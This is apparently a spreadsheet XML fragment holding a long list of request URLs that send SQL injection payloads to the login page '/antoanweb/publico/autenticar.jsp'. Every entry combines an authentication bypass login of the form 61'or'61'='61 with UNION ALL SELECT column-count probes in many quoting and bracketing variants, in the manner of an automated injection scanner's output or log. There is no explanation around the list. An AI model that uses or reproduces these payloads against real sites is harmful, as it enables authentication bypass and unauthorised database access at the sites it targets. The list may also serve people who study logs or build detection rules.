    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5741,5741,5741,5741#and((("uwgx"like"uwgx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect593,593,593,593,593#and((("uzsw"like"uzsw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect934,934,934,934,934,934#and((("uloh"like"uloh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8110,8110,8110,8110,8110,8110,8110#and((("mvru"like"mvru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2586,2586,2586,2586,2586,2586,2586,2586#and((("aphs"like"aphs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4607,4607,4607,4607,4607,4607,4607,4607,4607#and((("mkwb"like"mkwb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4313,4313,4313,4313,4313,4313,4313,4313,4313,4313#and((("opdp"like"opdp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect22#and"hzye"like"hzye</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2600,2600#and"hbfk"like"hbfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5409,5409,5409#and"lgqt"like"lgqt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6093,6093,6093,6093#and"lyee"like"lyee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6660,6660,6660,6660,6660#and"otrh"like"otrh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7323,7323,7323,7323,7323,7323#and"wwdd"like"wwdd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9305,9305,9305,9305,9305,9305,9305#and"fknq"like"fknq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6432,6432,6432,6432,6432,6432,6432,6432#and"vtzt"like"vtzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4127,4127,4127,4127,4127,4127,4127,4127,4127#and"hnkp"like"hnkp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9217,9217,9217,9217,9217,9217,9217,9217,9217,9217#and"osod"like"osod</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect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#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect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#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect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#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect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#and(5504=5504</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(3999=3999</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(3500=3500</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(4577=4577</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(1270=1270</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(1490=1490</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(5994=5994</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(8424=8424</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(1835=1835</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(4676=4676</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((6673=6673</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((7063=7063</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((7607=7607</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((3729=3729</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((2998=2998</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((9785=9785</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((3240=3240</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((6470=6470</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((1517=1517</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((2523=2523</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(((4403=4403</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(((2135=2135</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(((992=992</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((9469=9469</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((654=654</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((2480=2480</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((8867=8867</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((8037=8037</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((5713=5713</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((3695=3695</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect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#and('mxly'='mxly</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and('rlnn'='rlnn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and('dpjm'='dpjm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and('lprl'='lprl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('ublh'='ublh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('cpey'='cpey</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('qauy'='qauy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('qogr'='qogr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('kocu'='kocu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('qjxp'='qjxp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(('dqqy'='dqqy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(('ddtk'='ddtk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(('frni'='frni</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('bcug'='bcug</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('swev'='swev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('wawq'='wawq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('lqnw'='lqnw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('srkp'='srkp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('drfu'='drfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('lbwt'='lbwt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((('ejry'='ejry</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((('azaq'='azaq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((('pvwz'='pvwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('lsta'='lsta</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('zagl'='zagl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('zkdy'='zkdy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('pjir'='pjir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('snpn'='snpn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('syso'='syso</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('wpai'='wpai</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null#and'wlhp'='wlhp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and'ivlg'='ivlg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and'lbju'='lbju</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and'xdon'='xdon</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'fntr'='fntr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'zyya'='zyya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'czlp'='czlp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'tlgz'='tlgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'iqlf'='iqlf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'corz'='corz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null#and('ebga'like'ebga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and('pepe'like'pepe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and('tygn'like'tygn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and('xtaa'like'xtaa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('xtiq'like'xtiq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('caky'like'caky</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('nxcf'like'nxcf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('dpdl'like'dpdl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('yxuh'like'yxuh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('rkqv'like'rkqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(('fqdv'like'fqdv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(('sjnt'like'sjnt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(('vcjv'like'vcjv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('qadz'like'qadz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('oytw'like'oytw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('qnht'like'qnht</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('ozyz'like'ozyz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('msem'like'msem</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('voeu'like'voeu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('myas'like'myas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((('vuzu'like'vuzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((('rzya'like'rzya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((('csto'like'csto</t>
  </si>
  <si>
